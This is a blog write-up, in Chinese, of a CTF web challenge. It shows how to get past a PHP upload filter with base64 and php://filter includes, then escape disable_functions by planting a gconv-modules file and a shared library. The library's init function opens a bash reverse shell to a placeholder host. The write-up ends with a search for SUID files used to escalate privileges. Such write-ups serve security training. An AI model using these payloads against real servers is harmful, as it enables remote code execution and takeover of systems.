[2022DASCTF X SU 三月春季挑战赛]upgdstore的wp-优快云博客

本文介绍了如何在PHP8.0.1环境下，通过构造特殊文件上传和base64编码绕过disable_function限制，利用GCONV_PATH和iconv模块，最终实现恶意文件上传和shell执行的过程，包括使用show_source功能、SUID权限提升等内容。

考察点：利用GCONV_PATH与iconv绕过disable_function限制
使用GCONV_PATH与iconv进行bypass disable_functions_gconv-modules-优快云博客
题目分析：
- 题目显示上传文件，随便上传了一个txt文件显示：

在这里插入图片描述

要求上传php文件，构造文件内容<?php phpinfo();?>上传，查看信息

发现过滤了特别多的函数，需要进行disable_function绕过。php版本为8.0.1，因此使用antsword绕过是不行的；此外，show_source，include，base64等函数是没有被过滤的，可以用show_source查看index.php源码，构造文件内容<?php Show_source('/var/www/html/index.php');?>上传（show_source被waf了，用大写绕过），查看信息：

// index.php源码
<div class="light"><span class="glow">
<form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">
    嘿伙计，传个火？！
    <input class="input_file" type="file" name="upload_file"/>
    <input class="button" type="submit" name="submit" value="upload"/>
</form>
</span><span class="flare"></span><div>
<?php
function fun($var): bool{
    $blacklist = ["\$_", "eval","copy" ,"assert","usort","include", "require", "$", "^", "~", "-", "%", "*","file","fopen","fwriter","fput","copy","curl","fread","fget","function_exists","dl","putenv","system","exec","shell_exec","passthru","proc_open","proc_close", "proc_get_status","checkdnsrr","getmxrr","getservbyname","getservbyport", "syslog","popen","show_source","highlight_file","`","chmod"];	// 内容限制

    foreach($blacklist as $blackword){
        if(strstr($var, $blackword)) return True;
    }   
    return False;
}
error_reporting(0);
//设置上传目录
define("UPLOAD_PATH", "./uploads");
$msg = "Upload Success!";
if (isset($_POST['submit'])) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_name = $_FILES['upload_file']['name'];
$ext = pathinfo($file_name,PATHINFO_EXTENSION);
if(!preg_match("/php/i", strtolower($ext))){
die("只要好看的php");	// 后缀限制
}
$content = file_get_contents($temp_file);
if(fun($content)){
    die("诶，被我发现了吧");
}
$new_file_name = md5($file_name).".".$ext;
        $img_path = UPLOAD_PATH . '/' . $new_file_name;


        if (move_uploaded_file($temp_file, $img_path)){
            $is_upload = true;
        } else {
            $msg = 'Upload Failed!';
            die();
        }
        echo '<div style="color:#F00">'.$msg." Look here~ ".$img_path."</div>";
}

index.php限制了我们上传文件的类型，想通过GCONV_PATH与iconv绕过disable_function就必须绕过文件上传后缀限制，因此我们需要自己构造后缀无限制的文件上传界面。需要两步：

1、构造无限制后缀上传php文件，可以根据题目的源码进行魔改。文件内容上传时需要base64编码，绕过index.php对文件内容的检测。

// base64upload.php
<div class="light"><span class="glow">
<form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">
    嘿伙计，传个火？！
    <input class="input_file" type="file" name="upload_file"/>
    <input class="button" type="submit" name="submit" value="upload"/>
</form>
</span><span class="flare"></span><div>
<?php
error_reporting(0);
//设置上传目录
define("UPLOAD_PATH", "/tmp");
$msg = "Upload Success!";
if (isset($_POST['submit'])) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_name = $_FILES['upload_file']['name'];

$img_path = UPLOAD_PATH . '/' . $file_name;

    if (move_uploaded_file($temp_file, $img_path)){
        $is_upload = true;
    } else {
        $msg = 'Upload Failed!';
        die();
    }
    echo '<div style="color:#F00">'.$msg." Look here~ ".$img_path."</div>";
}
// PGRpdiBjbGFzcz0ibGlnaHQiPjxzcGFuIGNsYXNzPSJnbG93Ij4KPGZvcm0gZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbWV0aG9kPSJwb3N0IiBvbnN1Ym1pdD0icmV0dXJuIGNoZWNrRmlsZSgpIj4KICAgIOWYv+S8meiuoe+8jOS8oOS4queBq++8n++8gQogICAgPGlucHV0IGNsYXNzPSJpbnB1dF9maWxlIiB0eXBlPSJmaWxlIiBuYW1lPSJ1cGxvYWRfZmlsZSIvPgogICAgPGlucHV0IGNsYXNzPSJidXR0b24iIHR5cGU9InN1Ym1pdCIgbmFtZT0ic3VibWl0IiB2YWx1ZT0idXBsb2FkIi8+CjwvZm9ybT4KPC9zcGFuPjxzcGFuIGNsYXNzPSJmbGFyZSI+PC9zcGFuPjxkaXY+Cjw/cGhwCmVycm9yX3JlcG9ydGluZygwKTsKLy/orr7nva7kuIrkvKDnm67lvZUKZGVmaW5lKCJVUExPQURfUEFUSCIsICIvdG1wIik7CiRtc2cgPSAiVXBsb2FkIFN1Y2Nlc3MhIjsKaWYgKGlzc2V0KCRfUE9TVFsnc3VibWl0J10pKSB7CiR0ZW1wX2ZpbGUgPSAkX0ZJTEVTWyd1cGxvYWRfZmlsZSddWyd0bXBfbmFtZSddOwokZmlsZV9uYW1lID0gJF9GSUxFU1sndXBsb2FkX2ZpbGUnXVsnbmFtZSddOwoKJGltZ19wYXRoID0gVVBMT0FEX1BBVEggLiAnLycgLiAkZmlsZV9uYW1lOwoKICAgIGlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJHRlbXBfZmlsZSwgJGltZ19wYXRoKSl7CiAgICAgICAgJGlzX3VwbG9hZCA9IHRydWU7CiAgICB9IGVsc2UgewogICAgICAgICRtc2cgPSAnVXBsb2FkIEZhaWxlZCEnOwogICAgICAgIGRpZSgpOwogICAgfQogICAgZWNobyAnPGRpdiBzdHlsZT0iY29sb3I6I0YwMCI+Jy4kbXNnLiIgTG9vayBoZXJlfiAiLiRpbWdfcGF0aC4iPC9kaXY+IjsKfQ==
// 路径 ./uploads/ee69fd8184001342fbd3f643aa86edb6.php

2、构造include函数php文件，去包含我们第一步上传的文件，并且base64解码，就能够达到任意文件上传的目的了。

// includeupload.php
<?php Include(base64_decode("cGhwOi8vZmlsdGVyL3JlYWQ9Y29udmVydC5iYXNlNjQtZGVjb2RlL3Jlc291cmNlPWVlNjlmZDgxODQwMDEzNDJmYmQzZjY0M2FhODZlZGI2LnBocA=="));?>
// 路径：/uploads/e575807ac6647c61b2b5a54dd8d338c6.php

现在进行利用GCONV_PATH与iconv绕过disable_function的文件准备
- 1、准备gconv-modules文件，并利用我们构造的任意文件上传页面，上传到/tmp下，文件内容：
```
module  MGG//    INTERNAL    ../../../../../../../../tmp/mgg    2
module  INTERNAL    MGG//    ../../../../../../../../tmp/mgg    2
```
- 2、准备mgg.so文件，首先在mgg.c中编写如下内容：
```
#include <stdio.h>
#include <stdlib.h>

void gconv() {}

void gconv_init() {
  system("bash -c 'exec bash -i >& /dev/tcp/vps/port 0>&1'");
}
```
- 3、在终端中输入命令：gcc mgg.c -o mgg.so -shared -fPIC，然后将mgg.so文件上传到/tmp下
- 4、准备shell.php，base64编码后上传，然后通过includeshell.php去包含，但是出错了，查看phpinfo，发现iconv被禁了，只能换其他方式触发
```
// shell.php
<?php
    putenv("GCONV_PATH=/tmp/");
    iconv("mgg", "UTF-8", "whatever");
?>
// 路径 25a452927110e39a345a2511c57647f2.php
// includeshell.php
<?php Include(base64_decode("cGhwOi8vZmlsdGVyL3JlYWQ9Y29udmVydC5iYXNlNjQtZGVjb2RlL3Jlc291cmNlPTI1YTQ1MjkyNzExMGUzOWEzNDVhMjUxMWM1NzY0N2YyLnBocA=="));?>
// 路径1e106be92d196c433f803f11c16e534c.php
```
- 5、除了直接使用iconv函数可以触发刚刚的两个恶意文件，php:filter里的iconv转换过滤器也可以触发，修改shell.php的内容，base64编码后上传，然后通过includeshell.php去包含
```
<?php
    putenv("GCONV_PATH=/tmp/");
    include('php://filter/read=convert.iconv.mgg.utf-8/resource=/tmp/mgg.so');
?>
```
- 6、成功拿到shell，但是查了flag权限不够哦，需要提权，输入find / -perm -u=s -type f 2>/dev/null查找具有SUID权限的文件，发现nl、使用nl查看即可